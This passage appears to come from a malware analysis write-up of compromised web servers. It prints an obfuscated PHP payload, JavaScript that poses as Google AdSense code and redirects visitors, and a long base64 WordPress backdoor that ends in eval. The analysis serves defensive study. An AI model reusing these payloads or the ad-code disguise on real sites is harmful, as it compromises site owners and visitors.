5a2xlX\x32\x46\x6bX\x33d\x70\x5aH\x52\x6f\x49D\x30g\x4e\x7aI\x34\x4f\x77\x30KZ\x32\x39vZ2\x78lX2\x46\x6b\x58\x32\x68la\x57\x64o\x64\x43A\x39IDk\x77Ow\x30KZ29vZ2\x78\x6c\x58\x32F\x6bX\x32Z\x76c\x6d\x31h\x64\x43A9\x49\x43I3\x4d\x6a\x68\x34OTBf\x59\x58\x4diOw\x30\x4b\x5a29\x76\x5a\x32\x78l\x58\x32Fk\x583\x525cGU\x67P\x53A\x69dG\x56\x34dF\x39\x70\x62\x57F\x6eZ\x53\x497\x44Q\x70\x6e\x6229\x6e\x62\x47\x56\x66Y\x57Rf\x59\x32hh\x62\x6d5l\x62C\x419\x49\x43\x49\x69O\x77\x30KZ\x32\x560\x62WUo\x49\x6d\x680\x64H\x416Ly9\x77Y\x57d\x6cYWQ\x79L\x6d\x64vb2\x64sZ\x58N\x35bmR\x70Y\x32\x460a\x579\x75L\x6d\x4e\x76\x62\x53\x39wY\x57d\x6cYWQvc\x32\x68vd1\x39\x68Z\x48\x4du\x61nM/M\x30\x493MTYwN\x6b\x55\x32\x4e\x44\x5aB\x4e\x6bQxO\x44\x59zN\x54c2M\x7a\x56CN\x6ag\x31\x4d\x7aU4\x4eT\x55\x79QzE\x77\x4e\x54c0\x52\x44YxNEI1Q\x7aR\x43\x4e\x54k\x30Rj\x551NTg\x77NTIwNT\x670O\x54\x52\x45N\x44\x49\x30QzUz\x4d\x44\x6b0\x4ejQ4M\x30Iz\x4f\x44R\x42M\x30\x55\x30\x4d\x7aQ\x78ME\x5a\x47\x4d\x7a\x4d\x34\x4eD\x4d\x30M\x6aN\x45M\x44\x5aGQ\x55\x595R\x6bV\x47N\x6bY\x34R\x6aZGN\x6bYyRjR\x47N\x6bY\x33RUVG\x4dE\x591\x52\x6a\x46F\x51\x6a\x4aE\x4d\x6b\x4e\x46Nz\x49\x34MUY\x79\x4e\x6bY\x30\x4dTUxO\x54\x454RUV\x46N0R\x47\x52\x45Z\x45\x52\x6bQyMUUxRjB\x43R\x54V\x45\x51\x55R\x42RDV\x45\x4eU\x4d1RE\x52E\x52EN\x47MTIwMTBG\x4dDUwQj\x42FR\x44c\x69\x4bT\x73\x4e\x43\x69\x38\x76L\x530+I\x44wv\x55\x30\x4eSSVB\x55\x50\x67\x3d\x3d");
echo str_replace("ZZZZ", $k, $txt);
exit;
}
}
The base64_decode call returns HTML/Javascript code shown below:
function getme(str)
{ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ""; var i = 1; for (++idx; idx < len; idx += 2,i++)
{ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); }
document.write(new_str.substr(0,new_str.length-11)+"\u0026\u0067\u006F\u006B\u006B\u003D '''ZZZZ''' \u0022\u003B\u003C\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u003E");
}
google_ad_client = "pub-1430584408313843";
google_ad_width = 728;
google_ad_height = 90;
google_ad_format = "728x90_as";
google_ad_type = "text_image";
google_ad_channel = "";
getme("http://pagead2.googlesyndication.com/pagead/show_ads.js?3B71606E646A6D186357635B685358552C10574D614B5C4B594F5558052058494D424C530946483B384A3E43410FF33843423D06FAF9FEF6F8F6F6F2F4F6F7EEF0F5F1EB2D2CE7281F26F4151918EEE7DFDFDFD21E1F0BE5DADAD5D5C5DDDDCF12010F050B0ED7");
The google analytics code is cosmetic only. The actual bit that matters is the long string after showads.js?
which gets rendered into something like:
< script language="javascript" > window.location="hxxp://5.101.146.174/rr.php?aff=7012&sub=3401&gokk=ZZZZ";</script>
The idea is a request comes in with a GET index set, such as log.php?ebe08b514a5a5e808c9d9084f66
. The code will replace 'ZZZZ' with the GET string ebe08b514a5a5e808c9d9084f66
which determines what link the user gets redirected to.
WordPress Backdoor (used for Spamming)
Spammer
I noticed that random clients periodically go to a wordpress blog via HTTP POST. It's quite odd and for some reason, the account also seems to be sending periodic spam messages as well. I took the liberty of injecting a few lines to the wordpress index.php file in order to capture what was actually being POSTed.
The variable file
keeps on getting posted to the server with the following contents:
ZnVuY3Rpb24gZGVjcnlwdCgkdHh0LCRrZXkpew0KICAgICR0eHQ9YmFzZTY0X2RlY29kZSgkdHh0KTsgJHJlcz0iIjsNCiAgICBmb3IoJGk9MDsgJGk8c3RybGVuKCR0eHQpOyAkaSsrKXsNCgkkYz1zdWJzdHIoJHR4dCwkaSwxKTsNCgkka2M9c3Vic3RyKCRrZXksKCRpJXN0cmxlbigka2V5KSktMSwxKTsNCgkkYz1jaHIob3JkKCRjKS1vcmQoJGtjKSk7DQoJJHJlcy49JGM7DQogICAgfQ0KICAgIHJldHVybiAkcmVzOw0KfSBAZXZhbChkZWNyeXB0KCJxS09yeTlWYlZzR0hoN2lIajRxY21wK2FYOE9LYmxLK1c2dlpsSnZJYzFPbW1wdlZ6NWRVblVGYzA1aXJ4NStqY0Zkc2xzWlZiV3hCWE11bG85Q1ZwcWFhcXRtZXFLRFZuS3JPbEtETXNKWmJsNW5aeG1sbXdadWR5S0tZeUY1VGpJbW4zcTZIb3BtWWpOU3FnNWFEWjRHdnA4KzZpbWZObTJxN3BvNjJmMmlVaWFmZXNHWi9tSVdNMUp5VzBLS2tqWHg5ejdCbG5aaUVvdG10ZzgxN3FJS2VndGU2aW9EYW00KzdwcFc2YTUxOG42eldzSjEvbVpxeTFHYUR6SUJobEl4cDNNVjZtcGVBb3Rtamc4MkhhSmF2cDVtd25IemNtNURWbTViUWE1MThuNnpXc0oySG1acXkxR1NEeklDZWxxSisyOEtzZTVtWWpOUmxnNWFEWjRHdnA4KzZpbnpTa1dxcm81YW1mMmlVaWFlWnNHWi9tSVdpMUp5TnVtdWNscUtPenFxZHB0S0dvc3hxbDkybFk0S2VnczdFb0tyT21hVzZuSU9Wb1dlQ2lhemdzSjJMbUlDbXQ2S1dsV2VabHE2Qm5jS0hvZHFFZk5tdGc4MmhaM3lpaHRYRW9KN2NtMytlcXBXbWYyaVpobldqZzF4Ym5VRmN5NldqMEhOVG5KaW4xczJVb01abG05UmhxYzVZYkQxWm10TFFtcWZVbzNXSG02alhwbXRpWksvZDJHR2V5NTZnMlplZDBKdWZwcDZuMUkraXBNbFpjMjlYbmNhYWJxYXFtdG5WcFpIRnBxM1RwMXlIbUoyaW5LM1l6VjlVa1ZsaGttVnZiWnlncFYxY3o1NWpiWUpib2FGWG5jYWFiRk5ab1pHTVhGS0dtYVRVbXFuVm9tNm1xcHJaMWFWYWhwbWsxSnFwMWFKZFkyR3IydE9sb3RHcVlJbVZvTktkcHFXaFpJaVFWVnVMY2tKdlY1WEZxYWFsb1hXSXlhZW0wbkZubEp5WDBxYWRsS09jbE1TaVlOZWlXcUE5V01tcm5aK2ptZFBHY0tmRnJxZlhsNmVMcWFXbHFhZlMwS3FYMUY5YXhwV2R5cGVhbjFXY3g5ZWNsOVZaWVk1dVBvZVhsWmVubmRuVWNLZkZycWZYbDZlTHFhV2xxYWZTMEtxWDFGOWEySnVaejZLVHBhU24wWUdib2RlcW5ZV1psZFdqWFZPaXA4L1RsRkxVcHBtSFhGMmVRRld0bnFqSjBKZVhuMWxhb0QxWXhwK2xySEt0eWRpaXBNYXFZTmlucHRlbG5hS3NuZGlKVlpQVm41cmVZSmpJWTUyVVlyTFYxcGFhaEdCaG9EMVkxcXFTcDVwMWlMdU5WSjFCWE1paXFkR3FvNnh5V3EyalZXMXNRVnpYcDZ6WGM1T1VxSjJjbFpLV3g1cW55WmhjaFlaMWJLeVpycUthZnR1bW43NWxiZHFiaVgybGtwakpZM3VscHE2dWRvYWFmNXlYZ3BDdXlHT016WUdieW5lRjI0NTVtbVdSbDlsbmdMYUVvY3VKcDh5T2VacG5rZFBGbHBlbWthUzllNXVXZzUycmFZYmd4YU9LcXA1cXY0bXNsNFNiaFppZHFycXNsTXVCbkxXR2ZzYWJkWlpsbmF6Wlo0RGNpS0cwckliUGtHT0pwWnF0Mlp5VnBtZWh2WHVibFkrYWZHeUNydFNjaXFxZWFMTmtySmVFZUlHRmtLN0lZMy9PcjJ5emQzcXdqbm1hWm9YZnEyeUoyNEdieW5lTjNaZGpaS2FRcnNobGY1V05xTCtHZnNlR2hIMlluYXJFWlh2TXE2WEhabjdQajRpQnBJT3BzNW1Fa28yTnJucDYzWUI1cHFDU3ZjV2ZrN212cTc2aGRweUdoV2VnbmQremFudk9yMnl6ZDVpd2pubWFaWkxScTVhWHBvaXd2WHViazQ5aWdKNmV2TlNjaXFxZWFySmxxTWFiZFkyZ2tLN0laWXU1aFdtOWU1dVZoWWlJbnBDK2thT1gyNGx2cnArc2w0UjFsNWlkcXJPZGhwT3ZiTE4zZnNhYmRZU3RrSzdJWTR1VHIyeXpoNEhNbkllbW5wS3MyV2VBM0orYnluZVhsbzU1bW1pRnZacVdsNmFRc01kN2pzYWJkWXl0a0s3SVpvQzRyMnl6blluTWpvVmpucEN1eUdXTHk0QnZ4b3FOMHBsNWZhR1NsNXFuaTdxSm9zWjJtOHgvaDJpWGtibVNscGVtbTZDOWU1dmRnM1JrbUoycXJtaUt1cXF3c25hc3hwdDFnSytGMUpLV2ZLaXZiTEtkZXRPWnFueW9ncTdVbnBmYmdadktkNFdXam5tYVpaR1dtcGFYcG9peHZYdWJrNE9HcTRtQjFKS1ZlODZ2YkxPZGhzYWJkWlpwa0s3SVpvQ1RyMnl6clhyR20zV05vcEN1eUdWL3VLOXNzNkNDeHB0MWxtZVJ2TmxuZ055Tm04cDNqWlIvbldSdWc3bk5hbnlxbjZXL1pvTGFtNG1YcnB5cWtaeUtxcDVxdnB4OW1vQjRvNkNacmF0bWpMbXFjYTZmckplRXE0V1luYXJFWjRxcW5tdXpkbjJhZ0htbW9KblRzNktMMEp1a3htWmtuSStlZWErU3VycGppcFNKcEw1bGJjNlFoSnFla0s3SVpIK29yMnl6ZDQ3R20zV0ZvWXFzMldlQXRvMnF4M2w2dW81NW1tV0ZscXVXbDZhYXNyeUpySmVFaFplWW5hcXVaSXFxbm1xL2lvYTdpSjVvbG82cXA2dUtxcDVwdEltc2w0U0ZtNWFRcnNobGdhaXZiTE9kZ3NhYmRZQ3VrSzdJWTR5Nm81dktkNDNialhlcmFZYXFxcXFIcVp1YnluZUIybzU1bW1XUjB0bG5nTFo1bThwM2hkMkloNnRwaHVDemdJcXFubW15aDNhdmpubWFacEc4MldlQXo0MlB5WW1mM1l1ZmRaNkYwdGxuZjl5SnByMTdtNVNQaDZ0cGhlQ3JpbitvcjJ5em5YNjdqbm1hWm9hOW1wYVhwcEN5dlh1YjNZTmlmV3FMbDlsbmdMWjhyNzE3bTVPUG5hdHBodEMzYUlQTWdaSzhlYXlYaEhXZm81Q3V5R1YvdUp1THMzaWdxSTU1bXErRnJObG5nTXlibThwM2pkMkRZbjJZbmFyRWFJcXFubWkrWldYV21vZWpmWTdTMldkLzNJbWJ5bmVKazRPZHEybUd1czJXbDZhUnBiMTdtNU9QaDZ0cGhwaW5scGVtaEd6SG42eVhoSGg5aXBDdXlHWi9rNjlzczUyWXk0NTVtbWFHbDlsbmdMYWpwcjE3bTVPUG5KZVluYXE3bllxcW5tcStvSXJHbTNXRXI0bTZ6WVNLcXA1cHNtTjZ4cHQxbG1XUXJzaGpqS2lGbThwM2pzeVFZNEdZbmFxN25vak1lWnZLZDQyVGpubWFab2VzMldlQXFYMXB2WHViazRXSHEybUdxc21XbDZhSnBMMTdtOTJEZUlHbW01akZub3Fxbm1xL2VJNllqbm1hWlllN3hXZUtxcDVxdm1WK3hwdDFqR3FRcnNoamY3YWptOHAzaFppT2VacGxoNnpaWjRDcGpLKytaWitVam5tYWFJV1gwWXVLcXA2eXM0bXNsNFNlaVppZHFycGpoSk92YkxPZG1NYWJkWUJvaTd6Wlo0Q21uNW05ZTV1VmhYZXJhWWJRcjVhWHBwQnR0cCtzbDRTcmlaaWRxcmViaWFtSm04cDNqWldQcTRHSWtLN0lab0czbzV2S2Q0V1RnM2lYbUoycXNtaUtxcDVxdElpZmxvNTVtbVdIdThtVWlxcWVhclI2Z3NhYmRZeHFrSzdJWTMvT3IyeXpyWGF0aUhWMW1KMnF1bWFLcXA1b3YzbUczWTU1bW1lR2w5bG5nTGw5ckwxN205MkZoNnRwaHVETmZZcXFubWl5WlpqR20zV1dyb3ZncTVhWHBwR2l2WHVibFkrZWlYcWJsOWxuZ015Ym04cDNqZHVPZVpwbWhwZXJscGVtaEdpOWU1dVRoWWVyYVlhcXMyYUtxcDVxczJTc2w0U2JmWDJRcnNoa2dNNnZiTE90aXJPT2VacG9oN3VycW9xcW5tbStpYXlYaEhXYm81Q3V5R1dBazY5c3MzcCttWU4zcTJtRzBNV1dsNmFKbzhhTG5OcU9lWnBsa2RMWlo0RGNvNXZLZDVmZGpubWFhSVdyczVhWHBveXd2WHVibG9OM3EybUY0TVY5aGFpdmJMT0tldEtQWTU5NGtLN0laWXU1Zlh5OWU1dVRnNGVyYVlYZ3paYVhwb2h0dUhtc2w0UjFmYVNRcnNobGY1UnNtOHAzaHMrT2VacG5rWmZaWjRDMmhaQzllNXZkaEllcmFZWGdvMytGcDJ1dnZYdWJsWU5qbjVpZHFxNWtpcXFlYTc2SnJKZUVtNFdZbmFxMlpvcXFubWkraTZUR20zV01aWkN1eUdPQnFLOXNzM2VnMlkrSHEybUd1c1dXbDZhTXNiTjRyS2VPZVpwbGhielpaNERjbzRTNlpLeVhoS3VYbUoycXVtYUtxcDVvdjNtc2w0U0ZoWSticTVwb2lxcWVhTEtmckplRXE0bVdqNjJ6bHBlbWtHcTllNXVWZzJLcmFZWGdyNGFYdDZOOHlHU3NsNE9ybjMrSzBaYVdsNmFFcjcxN201V0RZMlNva0s3SVpvQzRyMnl6aW5xWWpubWFyNGE4MldlQXo0bWl4NG1zbDRPcm4yV1Fyc2hrZjdpdmJMS3Rmc2FiZFl4cGtLN0laWUdwaFp2S2Q0N01qbm1hWlpLK3U1U0txcDVvczJTc2w0U0ZpYXVRcnNoamk4NnZiTE4zbUxLT2VacG5rdEhObHBlbWlMSzllNXVXZzJPWG5aQ3V5R1IvbEt1YnluZU5sbzU1bW1XUnZLOTFsN2RzamJ5SnJKZUVxM1dZbmFxem9KZTRyMnl6ZDMyWWlZWjRySXVYMFphWHBvaHJ0SXFrem94aXEybUY0S2VXbDZhUm9yNmZySmVFbm9tWW5hcTJxNWE1aUxLNG9YYkdtM1dNWlpDdXlHT0FrNDJieW5lTzBJNTVtbWVGMHRsbmdNK0ptOHAzaVpXT2VacXZoWmZaWjRDMm41dktkNEhkam5tYVpaSzZvNTJLcXA1cXRJZUttWkIzbDRDUXJzaG1pN2l2YkxPZGhxeU9lWnBsaDcyYWxwZW1pYU85ZTV1VGcyU2JacEN1eUdTTHVLOXNzNGVjeHB0MWpHV1MwdGxuZ015RXNyMTdtNVNEbjUrWW5hcXpuWXFxbm1xL2U1ekdtM1dObjVDdXlHVi96cTlzczZDR3hwdDFqR1dGck5sbmdNeDlmTDE3bTkyRGVadURqWmpWbHBlbW1yRzllNXVUaFlpcmFaQ3V5SzEvdDJoOXZYdWJrNE9KbjRTYXJzaXJocml2YkxOM2hzYWJkWVN0aGRMWlo0Q3BqTEM5ZTV1V2hYVjVnNUN1eUdPQXFLOXNzM2Q2eHB0MWdLNk4wOW1XbDZhYWJMS0pySmVFZUlWNmlielpaMy9jZ1p2S2Q0bmJqbm1hWjVHWDJXZUEzSjZ3dlh1Yms1QjJoWmlkcXJLcmY4NTlxOHAzZXJHT2VacGxocXpaWjRDbWZadktkNWpMam5tYVpvWFJ1NnFLcXA1cXNvbVkxbzU1bW1pRnJObG5nTXlGbzcxN201U0VkNnRwaHFxbmxwZW1tbXU1aWF5WGhKNTVtSjJxczV1TGs2OXNzNTJHeHB0MWlHV0p2TmxuZ055Ym04cDNoczZEZDZ0cGhxMm5uWXlvaVhxOWU1dVdoR0Zqckl6VHI1YVhwcEJvdTNtc2w0UjFlWmlkcXNSbWlxcWVhTDk1ckplRW5uMldrWml6bHBlbWpHaTJpNWl5bTUycmFZYXR0NWFYcHBDeXYzbXNsNFNGaFppZHFyS3JpcXFlYTdOa3JKZUVlSW1tak5MWlo0RE1oYU83ZWF5WGhIVjVhSkN1eUdPTXVxZWJ5bmVHeTQ5amhZcVFyc2hqZjdpdmJMT3RtTWFiZFlXaG1kUFpuWXlvcjJ5emg0YWxqbm1hYUlhWDJXZUFxWTF1dlh1Yms0T2RxMm1HMEsrZWlLZDltOHAzbDVhS242T0lrSzdJWlgrVHIyeXpuWWE0aDRlcmFZYmd4WmFYcG9tanNubXNsNFNGaWFXUXJzaGppODZ2YkxPSGh0MktuSUdZbmFxN24zK29yMnl6ZW9xbmpubWFaNUtzMldlQXpJbHF2cCtzbDRPcmZaaWRxcnBqaXFxZWE3SmtwTHFPZVpxdmg3elpaNERNbjV2S2Q0ckxqbm1hWlliUzJXZC8zS09wdnArc2w0UjFsNWlkcXJ1ZGlxcWVhcjVsZnNhYmRZMmhqYjNGbHBlbWpLKzllNXVVZzJGNW1KMnF1bWlMazY5c3MzZWN1bzU1bW1lSHZObG5nS21GamJlSnJKZURxM1dEa0s3SVpvdTRyMnl6ZDNuYmpubWFaWkxSczRXS3FwNnlzbmhseHB0MWhHV1NsOWxuZ0pSOWhydDRaY2FiZFlCbGtLN0lZNHk0cjJ5emQ0YkdtM1dGb0pDdXlHV0J0M0NieW5lWGxvTjNxMm1HcmF1V2w2YU5vTDE3bTkyRG01OW5rSzdJWkl1MmdXekhlWnpHbTNXQXJwQ3V5R09BenE5c3M2Qit2STU1bXErRm1MT1dsNmFhcjcxN201U1BocHVZbmFxMnJJcXFubXEvbjZ5WGhIV2ZlcEN1eUsxL3FadWJ5bmVHejQ1NW1taVJ1ODJXbDZhRWFMMTdtNU9RbmF0cGh1REZscGVtaEsrNFpLVEdtM1dBcnBDdXlLMkJ1cEdac3Arc2w0U3JtNmlQcXF1V2w2YUlhcjE3bTVXUG5hdHBocnJKbHBlbWhMRzllNXVWaFhpcm5aQ3V5R1NBazY5c3M1MkcyWTU1bW1lR3JObG5nS2FGZXIxN205MkZocDk2bVpmWlo0RGNtNGpKWkt5WGc2dDFnWS9RcW1pV3pxYXh2WHVibG9WM3EybUcwNitXbDZhTWJMMTdtOTJEbkkyWW5hcTduSW1vcjJ5eXJYN0Vqbm1hYUliVHI1YVhwcEdqdlh1YjNZT0ltNWlkcXJwamlxcWVhTEpqZVppT2VacGxoN3paWjRDbWhZS3laS3lYaEhpRm1KMnF1NXVLcXA1cXRIbXNsNE9yaFlXT3E2dWdpcXFlYWJTSnJKZUVoWnVZbmFxem5wTzNjR3U5ZTV2ZGczZXJhWWF0cTVhWHBvMmdzcDJneHB0MWxtZVFyc2hraTdpdmJMS3Rmc2FiZFpacG1xelpaNEMybjV2S2Q0SGNpSjZubUoycXRtZC9rNjlzczRkOWxJOWhsNHVRcnNobGdKTjVtOHAzaWQySGg2dHBodERObm9TVHIyeXpoNDdHbTNXQVpaS3J1NWFYcG9SdHZYdWJsb04zcTJtRzBLdVdsNmFNYTdlZnJKZUVub21Xa0s3SVpIK1RyMnl6ZDUrV2pubWFaWWFzcDVhWHBwcXZ2WHVibFpDSHEybUcwS3FzZ2JpdmJMT2dpc2FiZFl5dWtLN0lZNENUcjJ5emg0N0dtM1dNWjQrODJXZUF0cHVMdjUrc2w0U0ZuNWlkcXE2c2s2bWZtOHAzamR5T2VacG5rcXEzcG9xcW5tcXlub0xHbTNXRXJZZTgyV2VBcHFPYnluZUYzWTU1bW1XSHZObG5nTXlqaUwxN201YUVZcXRwaGVDamY0bk9yMnl5clg3R20zV0laNFdzMldlQXpJR1F1NHB0eHB0MWhHcVFyc2hsaktpdmJMT2RtOXFPZVpwbmhxdkpscGVtaUxDem5xeVloWWVyYVliZ3hZMktxcDVwczJXR3hwdDFqWitQdk1XRmlxcWVhN1NJck1hYmRZMmdrSzdJWllDcWthR3luNnlYaEp1RnI0L1MyV2VBdHArSHZYdWIzWVNJZmFtTjB0bG5nTng1a3IxN205MkRuYXRwaHFxNnFvdTRyMnl6aDVlWWpubWFhSWE3MlphWHBwR2p2WHViazVDSHEybUc0THVXbDZhUXNiMTdtNVNEWXF0cGhlRE5ab200cjJ5emg1ak9qbm1hWjVHWHpZdUh1cEdpdlh1YjNZT2RxMm1HME1sbGpLWjltOHAzZ1ppT2VacG5oNnpSbHBlbWlHeTllNXVUa0htSm1KMnF1cXVVeldldXVZbXNsNE9yZFppZHFySm9mNUpvamJ5TG1MS09lWnBua2RMWlo0QzJqWnZLZDRIY2pubWFaWks4MldlQXBvbWJ5bmVLeTRlZHEybUdyYmVXbDZhUm9icUxuTE9PZVpwbGhxelpaNEMybzI2NW42eVhoSVdGbjRYUmtwYVhwcHVndlh1YmxJU2NnWVNRcnNobGk3bWJtOHAzZ2R1T2VacGxrcXpaWjRDVWZZNnplYXlYaEhpSmlwQ3V5R1NBdUs5c3M2Mmd0WnVjaVppZHFzUm1pcXFlYUwrSnJKZUVoWVdmaGF6Wlo0QzJnWnZLZDRXVGpZbWJoSXE3ekt1SHVLOXNzMlY2dG81NW1tV0ZsOWxuZ0ttTm04cDNpWk9YWXF0cGhlQ2pocFBPcjJ5emg0bmJpcDJGbzVDdXlHYUFrbXlOdUl1WXNveDNxMm1HME1TcWhwT3ZiTE9IaHNhYmRZaXVrSzdJWTRDM2JKdktkNFdUam5tYVpZZTgyV2QvM0htS3lwK0ttWTU1bW1XU3JObG5nS2FKbThwM2pzeURkNnRwaHEyM3BJZTJpWWE5ZTV2ZGczYWZhNUN1eUdPTXpxOXNzM2VHdG81NW1tV0YwWktXbDZhRXI3MTdtNVNFaDZ0cGhlQ2pscGVtaWFPOWU1dVdqNGQ1bUoycXhHZUd0NDJieW5lS3k0NTVtbVdHbDlsbmdLbUptOHAzbU11T2VacGxrcXpaWjMvY2ladktkNGJQaUhlcmFZYXRzNWFYcG9TdnVZbXNsNFNlZVlTUXJzaGpnTGRvbThwM2haT09lWnBta2J2RmhZcXFubW16aWF5WGhJV2VabzNTMldlQXo0R1B2WHViazRSaGFKaWRxcnVjaWJpdmJMS3RocmFPZVpwbmtielJlNGJPcjJ5em9INjltNGQ5cG8zUzJXZUFwcHVIdlh1YmxZK2RuNWlkcXE2dGg4Nk5qN2RrckplRWVJVjdrSzdJWklHMmZadktkNG5jam5tYVo1RzgyV2VBcHBGL3ZYdWJsSU9IcTJtRzA2ZVdsNmFKb0xlSnJKZUVlSVdZbmFxN25JcXFubWkvaWF5WGhIV05oSjNTMldlQXBxT2J5bmVCazRxSGlZK1Fyc2htZ2JpdmJMTjZpc2FiZFkyZWo3elpaMy9jZVp2S2Q0Yk9qSGVKYVl5WDJXZUF0b21ieW5lRmxJUjNmWXVPMHRsbmdLYVJoN0o1ZnNhYmRZUm9rSzdJWkgvT3IyeXpkNHJFam5tYVpZYTgyV2VBdG9HYnluZU96SXVKbjRPT3ZMZG5oOCtuZTcxN201T0RZbjJZbmFxMlk0ak9yMnl6ZDRyR20zV0lyWkN1eUdTQXVJR2J5bmVGM0l1Y2hZeVFyc2hqZ0xpdmJMTjZpcm1PZVpwbGtxcW5ob1M0cjJ5emgzNnBqbm1hWm9YUnQ0S0txcDVvczJObHVJbUpsNE9PcTZ0N2lxcWVhTDk0aHJtYVlubW1rSzdJWTMvTmtZdTllNXVUaEhpQm1KMnF1bWlLcXA1b3ZwK0d4cHQxbHErUXJzaGpqTGl2YkxOM2dzYWJkWXhxa0s3SXJZR29yMnl6clk2d2pubWFab1hnb3FXRnVLOXNzM2VHbHBxZHEybUd1cmVXbDZhRXI3MTdtNU9RaDRHSmp0R3JscGVtakdtOWU1dVVnM2VyYVliUXhaYVhwb1dqdlh1YjNaQjBmS1dIbUxlZGs2bHZuOGhtaHR5T1pIMmhtNjNabTR1VWpLZXVuNnlYaEloNW1KMnF0NXVLcXA1cHZvbXNsNFNJZUo2RXFiTnFmS3FmcGI5bWd0cWJpWmV1bks2UnBueXFxcVBLckg2cmluWnNlSkN1eUdOL3Q2K01ycUZseFgrZHEybUcwNnVobE5DQm04cDNsNWFPZVpwbmg3elpaNERQalp2S2Q0MlRqbm1hWjRYUzJXZUF6NHlodll0azA0VmppV21adnJKcW1McG5uN0dzbzhxUFkyeXNuYjZybzR5VW4yaXVkcVBaZjNWcllGcVBuRDA4aHF1bmhYQlVoWmVUckptWjNNcVlwYUtlcGNhY29KR1pvS0JYYzNCclY1akxxYXZab1pYUW0yNm9tSjdQMDZhbWlxcXMxNmVqejZXb21LZGcyZGFWcGRhcFlJbVpxYytpbjVTaW5aS1JYNlhXcWFqVXBseUhuS2Fmb2FiSHpwaGVoRmRhamx4ZGpIRTdjNmlnMjhlWm5zZGZYTXVsbzlDVnBxYWFxdG1LYmp5RlYxekxwYVBRYzFsYldaN1kwS0NSMTZxZDE2YVBrNU5TY0ZkYWo2QlhtTlNtcGNTb3A4aW9wSTVsbGFDRm1adlVxcXpUbEtISVgxOVZZbHFVMVp5ZngxOWhrMVYwekptZ282R1oxTVZobGRGbHJkQlZiMjFhbDZXa3BhT0pXMWJJcWFmU2txbldtNk9ta0dqRGduQlVoR0IzaVptbTBxT1FxS2lkMk5TT1lyOXhYTXVjcHRhcW41U2luWStQVlhMTG1xZlZuNVhSbWwrV3BHYmJ6RlZ0YkVGYmlaV2cwcDJtcGFGMWlNbW5wdEp4WjVTcXE5cGtrcUdXcE4vVm5KWFZhV2lUb3FiS1dHdzlXRnpiejZhbnhLcWIxNXlXeUpXZG5LT2pvNFdWbnRHZXJkZWZZb1ZsVTJGWnBzdllsNXZVWlZxVWNsYVJxYWFWcUt6WWlhQ1dsMTlhMFpXZ3hKZWtsMWRtMDhxV3BOR3JvZEtZWEl4ZlhXTmhxc2ZQbDFxVVoyU1haMTJNWkZPV2wzQ3drVlZ0YkZ1dDA2YXB4YW1VcFo2YXk4Q2ZtOUNpZFltVm9OS2RwcVdoWm9pUVZXQ0dwWjNjbDUzVlpGTmlkRnFVMUtpVTFhdXFqYUNZbUY1VG41ZWt4OEttbG9SbHBjNldwdEtxbXFDYVlJK0tYMktPcVpuVGwxeVZabDFsYVdHUGoxV1dzSitpdWxWdmcyVmdVNkdaMmRVOVZZYWRxdFNnY1lXamtweWhaZFRRcFpmU283R2xtcVBTbloyWVk1dlZ6bFZ0YkVGYzJLaVd6WnVVcDFWMWhvT0Ruc09hbllXVW9vT2xvNWVhcW9iRG1LYlpuSjNUVTRIRXFKU2JWV21iZ1dCU3I1aXF5SnRVbFdaUmxLT2NodHFpcDRLdW9kR2ZWTXFicFZPV3BvYkNsNWJMcTZIVW9aWFBWbUpqV2xqVngxT1owYWFjMkZPYTBxaFJtYWVkeTRKVmJXeGJxc3FVb05HWG5waFZkWWFEZXFIUm5xVEtVNExJcmFSVmNFS0t6cGlsMVppZnluQldwNXVTcFZWYWxJV1ptOVNxck5PVW9jaGtVMTgvUXIzR1U1UFVuRmpjb3FiT241K2FWYURIMDVkUzFxWll6cUNrMWFXbm1GV1owczFUb2NoWHA5cWxWTmF2cEtlYXBkbUJwNkdDcXAzWHFabURyNkNvVlpyTDFhZVgxR1ZZcnFGVXhGYWZtSmFxaHNlb3B0ZXBuWVdzbzloV3FKeWhwSWJEbUZMRG1hVEtVNmpTVnFHZmxwdkxnWlJTMEp5dmhhS214NXVqcG1GQzJ0T1VsYzFYc2RTb3BvT21rcGFnbWMzR3BsTERwWnlGbXBuWFZwSlRwNTNIelZPbXk2U2RoWitkMlp0UnBxcW8xdENscG9Ka1dNYWZvSU9jbzZLaVdOWFBtRkxTbzVuSW1HS0RWb1dibXFyTGdaU2t4MWVseHFHdGc2bWdZSmlaMHMyWWxvS1RXdGVZbGM5V3BLZWtxc3ZVajFTT1Y1cmFwMVRhbTFHVXA1MXcxWnVYZ3FhbTBheFUwcVNXVTZHZHpjcW5tOCtZck1wZlZNK2ZsSmlqcTh2RlU1UFFtMWpYbUtETWw1T2ZtbGpWejUrYjBKeFkySnVqMDZhYW9aeFkxczJVbGNkWG50U2xWTVNpblZPa25vYmFvcWZVcWxqU21Kak1tWktubnFmVWdhR1h4NXVyazFPTHlGYWdtWnVkMklHVm9kYWZXTWVsbGRHYVVaU2puSERJbUtESHFhSElwbFRRbTVXbVZaN1YwMU9veDZteGhaYWowS2FXcDU2c3o5ZVlVdEtwb2NpWXA1RldlcGxWc2RYV3BWTFNtSnZRbEp2SVZwYXBtcXFHeUppbWdxT24yS2RVMnB0UmxLR3Z4OXFtVXRtZ3BORlRwc2lwbVp5bFdNL1ZVNWpScVZqTHBabklaRHM5aDUzVHhxQ1V4NmxZMmFKVTJLYVZsS21kaHRxaXA5UlhtdFNpbjlDWG81Nm9XTXpRcFZMUnJLcUZiNVdEbnFPWW0zV05nMkZXeEtPbnpLaW16MlJUWWxkbWlzK1lxY2FncXBOVlk2SllYNmFxbXRuVnBWclBtMjJOVmFERm9wS1VxSnlJajZDYnhhbW4yWnloeUY1YVhHRm9rdE9Vb01aZmFwVmZaNU5mV21GWFg2VFBtS21DbUtiSlU1M1FwcU9pcTUzS2dhYW0wYW1kb1dLVm9XUTdQWGVkaHNLcWs5U2NXTlNaVk5hWmtxQlZxOC9WbUtXQ3JxSFptMVRXbjU2Y29abllnWitoMGFKWWtsT3J5RmFTcFpwWTJzbVlVdEdscE41VG85R2JVWithbjgvVm5KL0RxNTJGaUllRGw2R2pwNmZjeHBkUzBhV2t6cUdaZzVxanFKeXIydENsbDVCQlFxYWhtSU9vbHFDYXBjakdwVktQVjYvS1U1WFByWktzcUZqWnhwK2VncDJuMTFPZ3lLbWtWRDlDdXNLZWw0S1luTnVVb3RlWG1KaFZwOHlCb3FmVVY2dlZtSmZNbDUybVZXV0cwW